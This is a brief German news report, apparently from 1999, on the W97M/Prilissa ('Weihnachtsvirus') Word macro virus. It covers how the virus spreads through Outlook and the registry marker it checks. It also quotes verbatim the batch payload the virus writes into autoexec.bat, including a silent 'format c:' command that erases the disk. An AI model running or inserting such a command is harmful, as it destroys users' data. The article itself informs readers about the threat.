Weihnachtsvirus
Unter der Bezeichnung W97M/Prilissa wird der neue und bösartige Virus geführt. Er infiziert Word-Dokumente und verbreitet sich selbst über MS Outlook an andere Benutzer, wenn der Registry-Eintrag "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" "CyberNET"="(C)1999 - Indonesia by AnomOke!" noch nicht vorhanden ist.
Am 25. Dezember überschreibt er dann die Datei autoexec.bat mit folgendem Code:
@echo off
@echo Vine...Vide...Vice...Moslem Power Never End...
@echo Your Computer Have Just Been Terminated By -= CyberNET =- Virus !!!
ctty nul
format c: /autotest /q /u
Dieser wird dann beim nächsten Booten ausgeführt. Unter Windows NT ist die Gefahr nicht so groß, weil die autoexec.bat dort nicht beim Booten verwendet wird.
Networks Associates bietet bereits entsprechende Updates für seine Virensignaturen an. (mha)